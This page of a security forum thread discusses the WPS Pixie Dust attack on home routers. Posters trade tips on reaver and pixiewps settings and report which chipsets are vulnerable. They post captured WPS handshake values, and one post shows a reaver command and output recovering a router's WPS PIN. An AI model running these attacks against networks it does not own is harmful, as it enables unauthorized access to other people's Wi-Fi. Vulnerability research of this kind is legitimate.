Page 6 of 12 FirstFirst 123456789101112 LastLast
Results 251 to 300 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #251
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    I added a new Realtek video demo... "WPS Pixie Dust Attack: Automatic Ralink/Realtek/Broadcom" for those of you having trouble. Can't post youtube videos so you'll just have to search for it.

  2. #252
    Join Date
    2015-Mar
    Posts
    127
    I couldnt find the video yet, even under your name/channel. Probably not finished uploading.

    Is the new pixiewps ready? with more realtek support?

  3. #253
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Not all the realtek support. It's still under development but the process will be the same. If it doesn't turn up a pin the first time you try it against Realtek, run it again. I had the problem in the video but didn't want to cut it cuz then people would think its fake.

    Btw, I use pixiewps right from Wiire's github, not from the Kali repos.
    Last edited by soxrok2212; 2015-04-20 at 22:04.

  4. #254
    Join Date
    2015-Mar
    Posts
    127
    Nice video !!!

    Greet work all involved.

  5. #255
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by nuroo View Post
    Nice video !!!

    Greet work all involved.
    Wiire is literally a genius. He is literally the key to most of the development. Kudos to him, and to all the others who've helped.

  6. #256
    Join Date
    2013-Jul
    Posts
    841
    Pixie Dust Data Types and successful WPS pin extraction.

    There are(2) two types of Pixie Dust Data Sequences:

    When --dh-small is used in the reaver command line the -PKR sequence is fixed and not variable.

    When --dh-small is not use the -PKR variable constantly changes.

    Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.

    MTeams suggest that if you run a --dh-small attack and do not acquire the WPS key from the data, remove the --dh-small from the reaver command line, collect some more Pixie Dust data sequences with a variable -PKR and try again.


    MTeams Labs

  7. #257
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by mmusket33 View Post
    Pixie Dust Data Types and successful WPS pin extraction.
    Musket Teams have come across routers where --dh-small sequences did not provide the WPS Key while the same reaver command line without the --dh-small in the command line thus -PKR was variable, provided data that DID extract the WPS Key.
    I just want to point out that the tool is not completed yet, it works only (for Realtek) if the 3 nonces are generated within THE SAME second. So we can't be sure wether --dh-small cause bugs. I think you should try to supply the right pin with Reaver to the AP using --dh-small. If it works and the AP goes past the M3 then it should means that it works with --dh-small too (unless there's a bug in my code lol).

  8. #258
    Join Date
    2013-Jul
    Posts
    841
    To wiire


    Further PKR corrections when using --dh-small in the reaver command line

    Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

    MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

    In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

    Musket Teams Labs

  9. #259
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by mmusket33 View Post
    To wiire


    Further PKR corrections when using --dh-small in the reaver command line

    Musket Teams noticed that the PKR variable when --dh-small is employed in the reaver command line should normally be a long series of zeros ending with :02. Total string length is 575. However in all the output provided by the modded reaver, the PKR variable when dh-small is used show the 02 at the beginning of the string and the key is never found

    MTeams moved the 02 to the end of the PKR String and the WPS key was immediately found.

    In these cases if the key is not found then transpose the 02 to the end of the string when --dh-small is used OR remove --dh-small from the reaver command line and collect new data with a variable PKR.

    Musket Teams Labs
    PKr gets printed in little-endian when using small keys (only). When adding the lines of code to print PKr I didn't test with -S, ops. If you sniff the traffic with Wireshark you see it's OK. BTW if you use pixiewps with small keys (-S) the program will automatically set PKr = 2 (00: ... :02).

    That's beacuse with small keys Reaver sets its private number = 1. Thus: g^A mod P = 2^1 mod P = 2 (P is a huge prime number > 2).

    Anyway now the recommended version of Reaver is the one made and mainteined by t6_x and datahead (which prints it right). I updated the link to my original post.
    Last edited by wiire; 2015-04-21 at 14:16.

  10. #260
    Join Date
    2014-Oct
    Posts
    44
    uhm, anyone had any luck with atheros chipsets yet?

  11. #261
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by wn722 View Post
    uhm, anyone had any luck with atheros chipsets yet?
    I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.

  12. #262
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by soxrok2212 View Post
    I talked with Dominique, he said Atheros seemed pretty secure. I haven't looked into it much yet to be honest... maybe in the future. We need a lot of data to analyze to see if we find any similar hashes.. etc.
    Hi soxrox ,

    I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

    I can send you ... Maybe you can use for analyz...

    TPLiNK uses generaly this chipset...

    send me an email...

    thanks..

  13. #263
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Saydamination View Post
    Hi soxrox ,

    I have a few TP LiNK RTL 8671 EV 2006 07 27 Realtek chipset modem information ( modem pictures, eap-eapol cap files )

    I can send you ... Maybe you can use for analyz...

    TPLiNK uses generaly this chipset...

    send me an email...

    thanks..
    My e-mail is my username @gmail.com

  14. #264
    Join Date
    2015-Apr
    Posts
    15
    some updates for the database ;-)


    Compal CH6640E
    Realtek RTL8192CE

    After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
    So, what else, its some kind of VULNERABLE .

    Code:
    [P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23:cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:95:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07:9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27:a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc:5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e:00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:74:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f:4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0:a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:50:a8:6c:d4:a5:da:e4:46:51
    [P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18:0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
    [P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e:c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
    [P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d:f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e

    NOT VULNERABLE:

    TP-LINK TL-WR740n v1/v2
    Broadcom BCM5356


    Code:
    [P] E-Nonce: 28:68:6d:cf:7d:d7:09:e4:72:3b:c3:51:be:27:a6:16
    [P] PKE: 85:c2:b7:ed:9a:a8:04:39:8e:7e:cd:1c:f3:c3:df:e6:7e:07:91:cc:80:98:56:38:8d:e1:b7:42:57:7f:62:e2:a0:39:8f:e3:84:48:ce:10:87:66:a7:5b:91:d2:b5:8e:ec:cb:4c:8c:96:5a:c7:66:11:61:e5:78:42:55:3a:65:8d:ef:b1:d2:69:e7:ce:06:a3:b4:36:bd:c1:e9:2c:e8:46:2d:44:e3:93:66:c6:48:85:a0:ac:14:ee:11:b7:76:68:61:0a:ef:be:ed:a3:19:31:70:68:c2:fb:eb:65:c6:44:6a:02:d6:fb:25:8e:6a:10:2f:38:8a:a5:a6:de:c3:69:f9:b0:2b:0a:2b:ce:12:a8:4f:b6:dc:be:48:c0:d7:28:08:d8:4d:10:e7:89:9b:15:54:10:d3:a0:25:d1:da:7c:48:2d:22:87:e1:8d:2b:2b:f6:0f:3f:ab:14:3e:8d:ab:c5:5a:b8:8b:4a:a4:60:38:6b:dd:66:25:c1:ca:1e
    [P] PKR: 2e:56:24:ad:1d:7e:77:0f:a8:b9:fd:6b:4b:9b:ed:38:23:e7:44:c8:72:ef:ea:5e:57:bd:6a:a4:05:31:8b:70:81:30:03:80:cb:83:f5:ba:81:68:69:b1:cb:cf:d1:d4:86:8d:d0:25:1c:0d:03:b1:8f:47:4e:1b:3f:01:ec:62:c2:51:e4:6a:54:59:96:e0:7c:72:0a:bf:64:2d:de:cf:d8:49:f5:ca:ae:88:5a:d1:ff:9f:ac:ff:32:9a:fb:33:64:fa:2f:44:93:aa:56:64:e4:9d:41:3e:3a:44:99:53:1d:f6:b3:b4:82:94:fa:dc:aa:a1:56:61:0b:d5:80:48:e3:5d:53:d2:36:fb:6f:85:8a:9c:08:af:62:1a:0b:ea:23:70:b3:63:0a:ea:4f:3e:62:7c:5d:ba:11:2d:41:9c:4f:3e:18:2c:fd:94:11:ad:a3:8c:c9:75:11:da:a3:ee:62:84:36:03:fc:bd:a5:b5:b3:0e:73:81:4b:61:7d:3f
    [P] AuthKey: cc:e9:3a:92:e6:1c:dd:a2:ab:92:d7:f3:13:a0:d3:67:92:cd:75:7b:19:f6:9a:44:18:77:e6:17:ee:5c:33:3a
    [P] E-Hash1: 83:90:f2:7e:17:5d:44:c4:38:c3:4e:cb:bc:80:92:0d:77:b3:40:97:35:d5:9b:9a:da:a4:10:49:1b:b4:0f:07
    [P] E-Hash2: e2:c2:90:1e:c2:21:ac:c4:4e:48:b6:4a:d9:cc:67:b1:e1:67:7e:01:5e:af:33:53:40:fc:07:2a:ef:a1:d5:29
    NOT VULNERABLE:

    Belkin F7D1301 v1
    Broadcom BCM5356A1


    Code:
    [P] E-Nonce: 84:87:88:e4:b0:9c:15:6c:20:cc:36:58:40:7c:83:6d
    [P] PKE: 17:17:85:b8:2d:a4:54:d8:55:85:e2:0e:78:f2:94:56:29:b4:d8:d6:f8:d6:9b:43:1c:d8:b5:c7:49:dd:e6:43:d9:43:f8:bb:8a:aa:54:94:b8:01:7f:67:81:95:92:c1:9d:f6:4f:9c:0a:db:83:b4:23:2f:b6:61:7d:01:67:8f:10:30:94:e7:d7:f5:db:bd:ea:44:cb:92:ec:00:a3:02:73:c5:5b:c7:13:e0:88:a0:49:af:7a:15:55:69:ba:06:aa:b4:49:a5:10:f7:1d:cc:b6:ad:f5:09:05:77:05:10:5e:3b:5a:a9:83:98:0f:d8:0b:76:d0:db:4f:1e:e7:0d:81:7b:37:23:bb:9f:1b:c5:13:ad:98:fc:af:29:bf:91:6a:ef:1d:ef:f4:74:29:b7:de:8f:9d:8c:a4:4f:dc:98:90:26:13:30:3b:9e:db:d6:bd:b7:25:a3:0e:31:69:ab:e7:bb:bd:b5:48:9d:c6:aa:a0:95:b3:9f:10:02:e3:a0
    [P] AuthKey: a6:27:f5:13:be:0c:41:cc:24:1c:c3:a7:c7:99:20:48:c9:dd:b0:51:82:a0:51:29:2b:7b:2e:18:8b:76:fc:24
    [P] E-Hash1: c4:0d:69:f7:ca:eb:50:5e:e9:84:8f:ab:0b:21:2b:5c:fa:90:21:f6:a2:98:9a:ef:ef:12:a5:5e:3c:d3:61:a4
    [P] E-Hash2: 86:94:0c:25:ea:ac:32:15:7a:71:2a:66:50:b3:e7:3a:c6:3d:02:1a:7a:4f:74:71:87:f3:df:54:ba:b4:21:98

    NOT VULNERABLE:

    ASUS RT-AC66U
    Broadcom BCM4706


    Code:
    [P] E-Nonce: cf:93:1f:a3:6e:ac:6d:76:45:54:a3:06:cc:2d:36:2b
    [P] PKE: 24:b3:71:23:bb:44:69:98:6a:d5:a6:e4:99:a5:5f:6d:c6:75:e6:87:6e:50:ca:b6:88:13:c7:a3:b3:1f:5b:66:16:70:ee:a8:1a:33:08:0c:e9:98:28:cf:6d:54:d3:f9:52:73:5d:7a:10:0c:84:9c:81:74:2e:ec:85:d9:be:d6:75:49:bf:78:d9:a0:da:86:1b:9a:50:a4:5f:ea:f8:fc:68:b8:a4:a3:9c:bc:87:92:a4:a1:17:8f:00:76:39:9a:d5:33:01:41:86:7d:e5:83:ca:06:6d:6c:a7:ae:10:94:55:fb:74:23:e1:7a:d3:35:e5:62:1d:4c:c4:e6:cf:47:ff:ea:1d:b3:ce:03:b7:32:42:f7:c7:bb:bc:eb:94:03:71:86:04:63:6f:b2:97:36:40:b1:3b:b1:80:25:5c:70:90:79:a7:4e:3f:c4:b8:ad:e5:8c:ff:c7:65:a6:3a:95:fc:40:6a:8a:f9:80:ef:18:6b:d4:6d:40:6e:e3:ae:2a
    [P] PKR: 23:3a:61:72:e4:59:9f:bd:f4:70:b6:5a:e9:6b:d4:e2:28:14:ed:ca:38:89:c0:4e:77:b6:22:78:3d:74:99:fe:cd:52:d6:e1:ea:14:06:2e:86:f4:9b:77:4c:0e:a9:b3:06:56:0b:4a:11:d1:46:4c:62:b6:56:cf:61:98:2d:e7:95:3a:1e:01:e5:b0:50:12:a0:36:c5:4a:e1:d1:68:50:8a:c3:f5:de:5a:2b:ce:82:62:41:81:6a:a2:9b:0f:14:63:b1:0b:f0:db:82:19:2f:5a:6a:a5:b2:9d:cd:f1:36:fb:e6:ad:13:77:79:bf:77:80:b3:72:6e:d7:76:62:dc:1d:ca:81:a1:f8:f3:56:c7:f1:92:59:70:ca:db:2c:43:16:db:ea:a6:3a:40:6f:59:9c:b8:3e:db:e6:21:11:21:38:9e:d8:2c:e0:df:85:40:4d:4e:a7:93:e3:ee:eb:f8:25:c9:98:c0:e8:49:8b:6e:b3:c4:1a:f9:72:18:a4:53
    [P] AuthKey: 64:9b:23:3a:c5:4d:84:1b:9d:8d:ef:49:64:d4:02:de:7d:b0:73:7b:c1:28:61:69:7f:a1:0e:b6:11:59:1c:d6
    [P] E-Hash1: 45:32:81:a0:27:f4:2e:b5:e7:31:27:79:ed:ae:0c:d7:a9:22:66:9f:43:8d:07:a0:a4:23:03:55:c6:e7:ea:d3
    [P] E-Hash2: d1:5a:cd:32:79:52:73:4a:d5:83:96:1b:59:9b:76:5f:d3:5f:77:d8:1a:d8:86:7e:d9:d3:46:03:f2:b7:1b:3d

  15. #265
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Sweet thanks! Just updated everything.. should be all set

  16. #266
    Join Date
    2014-Nov
    Posts
    7
    Not vulnerable:

    ZyXEL VMG3312-B10A
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: VMG3312-B10A
    [P] WPS Model Serial Number: 96368GW

    Code:
    [P] E-Nonce: 10:74:5a:93:5d:0c:e9:38:fb:27:0d:2c:44:6a:47:aa
    [P] PKE: bf:ce:38:9a:76:34:e7:62:2a:09:72:5d:12:04:e0:1b:c3:94:1b:38:d5:6f:9b:bc:1e:fe:48:17:26:62:6f:27:b1:53:50:e1:d7:0d:65:09:30:90:4f:fd:80:4c:eb:c5:5b:9c:f8:c6:e0:66:79:10:72:91:32:e6:a5:93:ce:90:3b:5c:c3:8c:be:97:fd:a3:ca:65:44:98:fc:5b:92:ae:ca:dd:56:42:d0:72:dc:66:1c:89:c6:9d:d1:07:0a:40:dc:88:76:60:c5:55:20:75:d6:83:5a:19:37:e9:9f:df:35:72:66:b7:ca:94:e3:cd:75:30:2a:27:dc:03:97:fa:3b:a3:3d:52:3f:4a:47:f5:07:76:02:d9:68:a2:41:5f:5a:04:2c:00:74:c5:e5:8a:a8:ea:c3:f0:c3:af:d8:a4:fa:8a:70:5c:9d:48:b2:e3:f4:2e:57:7c:a3:23:0f:88:c7:10:4b:cf:6e:aa:1e:cc:65:92:f6:30:16:dd:76:db
    [P] PKR: d6:35:6a:d5:96:cb:22:1f:dc:8e:3e:36:98:81:3c:26:f4:73:27:7c:00:f4:0a:0f:4d:5e:ff:e0:3f:a7:24:d1:6e:39:00:7e:65:cd:f6:10:f9:63:4a:47:54:a2:83:f0:4b:4d:61:8a:6b:0f:f6:3c:c9:fb:30:b7:d5:6a:cd:60:6a:26:37:e1:19:d9:e1:a4:62:44:c9:05:8c:65:04:d5:9f:e0:04:06:5e:5f:2d:1d:01:42:69:c7:a2:01:76:c0:71:87:6d:f0:11:36:e4:9c:6c:61:0f:5a:82:06:e7:f8:b8:f0:f5:3a:5f:6b:ad:6e:7b:a2:73:b5:a3:b3:45:9e:b4:17:c9:4b:4f:03:25:ea:a5:9d:ff:85:6c:15:53:b1:58:7a:c2:c6:fb:b1:96:34:44:9a:c7:38:e4:99:b4:27:7c:12:90:84:a4:94:4f:d9:79:df:2d:44:7e:8d:98:e0:1f:bf:42:19:a2:53:ee:8c:39:d5:57:e4:85:b2:09:e2
    [P] AuthKey: 75:2f:50:4b:1f:e5:69:92:8d:f5:9e:3f:6c:29:47:7e:87:0d:2d:6e:ba:71:c8:ae:23:00:e7:ff:f7:a5:d0:94
    [P] E-Hash1: 30:b0:f8:c1:d0:ae:d1:72:bc:65:46:65:94:a3:8d:09:47:82:78:ed:bd:2e:db:b8:49:4a:7e:19:7d:e7:8f:05
    [P] E-Hash2: 5e:b9:8b:28:34:79:09:d5:b5:99:48:34:14:78:3c:ea:f2:ef:0a:a2:ac:c4:5a:97:1e:a7:41:4d:6e:36:5c:e3
    Last edited by SubZero5; 2015-04-22 at 08:47.

  17. #267
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by SubZero5 View Post
    ZyXEL VMG3312-B10A
    [P] WPS Manufacturer: ZyXEL
    [P] WPS Model Number: VMG3312-B10A
    [P] WPS Model Serial Number: 96368GW
    Awesome thanks
    Last edited by soxrok2212; 2015-04-22 at 13:35.

  18. #268
    Join Date
    2015-Apr
    Posts
    28
    Quote Originally Posted by soxrok2212 View Post
    My e-mail is my username @gmail.com
    Hi soxrok ,

    I sent an e-mail ...

    good luck

  19. #269
    Join Date
    2015-Apr
    Posts
    15
    @ soxrok

    please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

    And a new one for the Database:

    NOT VULNERABLE:

    TP-LINK TL-WDR3500
    Atheros AR9340 / 2.4GHz
    Atheros AR9300 / 5GHz


    Code:
    [P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
    [P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be:a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65:9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31:23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12:e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f:fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:39:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c:9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe:2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4a:f7:34:7e:da:36:0f:21:8f
    [P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c:03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:44:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f:ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b:f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:41:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2:fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a:b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:15:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0:c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc:2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e7:44:dd:7d:77:5a:99:06:7b
    [P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b:c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
    [P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85:74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
    [P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82:cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f

  20. #270
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    @ soxrok

    please update the Chipset from Hitron CVE30360. The correct one is RT 3352F

    And a new one for the Database:

    NOT VULNERABLE:

    TP-LINK TL-WDR3500
    Atheros AR9340 / 2.4GHz
    Atheros AR9300 / 5GHz


    Code:
    [P] E-Nonce: 1f:e5:c5:65:01:98:8c:c8:af:d5:40:33:5e:65:bc:8c
    [P] PKE: 32:37:af:a7:a7:a7:f4:48:cb:31:a2:8c:c5:7b:50:68:be:a1:04:cc:28:5d:56:2c:e3:9b:c1:52:99:7e:b7:26:7b:0e:0b:d1:c2:57:22:1f:53:88:4d:79:98:8d:44:5e:3a:65:9b:e3:36:cc:3a:10:57:af:f4:f0:db:c1:02:14:0c:57:31:23:26:27:9c:c2:b3:7e:fd:8c:f1:ff:8c:a9:f9:04:2d:0a:46:09:c6:3b:97:75:04:8c:57:16:34:2e:4e:ef:01:12:e6:cc:e2:12:86:6b:a5:26:78:7b:23:73:6f:96:5f:03:8f:fb:c8:73:ab:5d:0f:dd:e4:58:91:c2:30:f5:84:a8:fe:39:eb:88:4e:e9:c0:5e:f4:3c:a2:60:8a:cc:40:8f:b1:1c:9c:bd:49:51:18:9e:93:54:70:e5:20:8d:85:0d:4f:66:fe:2f:7a:e3:c4:84:15:39:18:4d:8f:35:83:1f:e7:23:e5:4a:f7:34:7e:da:36:0f:21:8f
    [P] PKR: 48:58:5f:0a:01:9a:e1:ac:8f:0c:e8:9e:c4:16:9b:c7:0c:03:02:f9:29:fb:2e:a3:6a:39:d1:87:76:e2:b5:fc:dc:44:e2:72:31:f2:75:42:af:13:33:ce:6d:a8:e0:87:2d:2f:ee:fa:27:6a:1c:0f:e7:4d:de:73:42:e8:b0:43:44:72:4b:f2:86:c9:f7:8d:47:fe:80:30:35:5a:5c:44:f7:a9:5d:41:66:79:2c:7b:2a:b8:e9:f4:a5:29:93:48:f7:57:e8:f2:fc:02:ba:6a:8b:dc:89:a5:32:f1:eb:a6:b2:64:83:c4:5a:b5:a3:96:c0:ab:25:ec:f7:2e:e2:7e:71:bd:36:c7:d0:15:89:4c:b9:e9:20:d9:23:67:c4:d4:03:5c:29:74:72:a0:c8:57:b4:8d:1e:15:c9:3e:75:84:8f:cb:c4:3a:f2:ed:fc:2e:d7:a6:31:c7:4c:01:d2:cd:ad:7a:2b:ef:4a:1c:b1:e7:44:dd:7d:77:5a:99:06:7b
    [P] AuthKey: 01:ff:58:b8:ea:a8:d9:e1:a0:f0:7f:31:93:9b:d2:c8:0b:c8:98:35:72:16:4b:da:29:98:e2:bd:04:9c:37:10
    [P] E-Hash1: 27:7d:37:15:b0:ca:7c:dd:45:56:0f:a9:83:26:fa:a8:85:74:9c:44:99:77:d2:a3:99:26:e0:33:8b:be:86:a3
    [P] E-Hash2: 51:d0:4c:00:a2:b2:bc:01:dd:6f:d9:4c:32:76:33:3e:82:cc:72:14:e8:a0:b9:64:30:36:df:2c:95:e9:83:1f
    Whoops... thanks!

  21. #271
    Join Date
    2015-Apr
    Posts
    5
    hi soxrok2212 what about technicolor TD5130? is there any method to crack it

  22. #272
    Join Date
    2015-Apr
    Posts
    9
    your news version it works in TD5130 v 2 ..but TD5130 V 1 no a will wait a new video for all chipset realtekk

  23. #273
    Join Date
    2015-Apr
    Posts
    1
    I am not success with this AP, Do you need me gather more any infomation ?


  24. #274
    Join Date
    2015-Mar
    Posts
    19
    Doesnt work in uk talktalk super router
    broadcam chipset huawei model

  25. #275
    Join Date
    2015-Apr
    Posts
    4
    I confirm it's working on Technicolor TD5130 v2... :

    Code:
    wifislax ~ # reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -K 3 -P
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from A6:25:89:XX:XX:XX
    [+] Associated with A6:25:89:XX:XX:XX (ESSID: TNCAPxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Realtek Semiconductor Corp.
    [P] WPS Model Number: EV-2010-09-20
    [P] Access Point Serial Number: 123456789012347
    [P] PKR: 44:7c:98:9e:94:47:e5:bc:22:0e:4f:b9:19:86:18:3a:35:e9:70:8c:6d:97:a3:81:53:08:1b:22:4c:4a:fd:0a:2a:a0:b9:37:de:31:86:2f:63:a1:2c:75:35:10:d9:2b:e3:8f:b7:6b:57:c9:58:fd:e8:0e:bf:87:44:08:23:84:ca:85:ec:2d:53:f3:27:cd:d5:a5:e7:93:9f:3a:7a:66:d3:c4:f1:eb:d4:e9:6c:60:ce:63:12:bc:ac:04:1e:ca:fd:ab:cf:b0:a4:d3:ad:39:f5:bd:1e:b2:c1:93:34:9d:b7:8b:cc:98:c9:3e:90:d6:08:c0:08:18:51:d3:ff:5f:6a:a5:32:a5:d3:5f:7d:48:bb:4f:f1:bc:eb:ac:95:22:8f:da:e3:a2:46:b9:52:3c:ff:95:db:95:a9:0c:28:30:f8:68:97:9a:a7:66:02:9c:11:da:ab:3d:7d:b7:30:ab:a8:69:c5:07:f5:da:da:e3:3b:36:7e:f0:97:80:7b:27
    [P] AuthKey: 04:b8:0b:ef:4b:f1:12:76:23:39:2d:f6:32:bb:c3:57:15:45:17:c9:46:e3:a0:3b:44:80:2e:83:16:d8:1e:22
    [P] E-Hash1: e6:0e:1b:5f:e2:f1:bc:eb:1e:f7:c4:1d:69:97:3a:ea:3b:81:25:aa:64:4a:23:11:cb:cd:52:8e:c3:78:39:9a
    [P] E-Hash2: b9:f4:db:b2:08:1b:31:43:6e:70:9f:ca:cb:4d:bb:5d:0a:fc:86:5b:a4:76:33:e6:e0:cd:1b:b9:05:2f:d1:ce
    [Pixie-Dust]  
    [Pixie-Dust][*] ES-1: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [Pixie-Dust][*] ES-2: 57:51:75:d2:5f:d2:e1:0e:0b:20:d4:c4:0b:40:34:1a
    [Pixie-Dust][*] PSK1: 49:40:f7:f2:af:67:5a:50:81:12:b6:27:82:2f:35:3b
    [Pixie-Dust][*] PSK2: d7:c0:5c:8d:60:9a:a6:cc:c0:fe:9e:6c:36:77:04:84
    [Pixie-Dust]   [+] WPS pin: 99280710
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]  
    Running reaver with the correct pin, wait ...
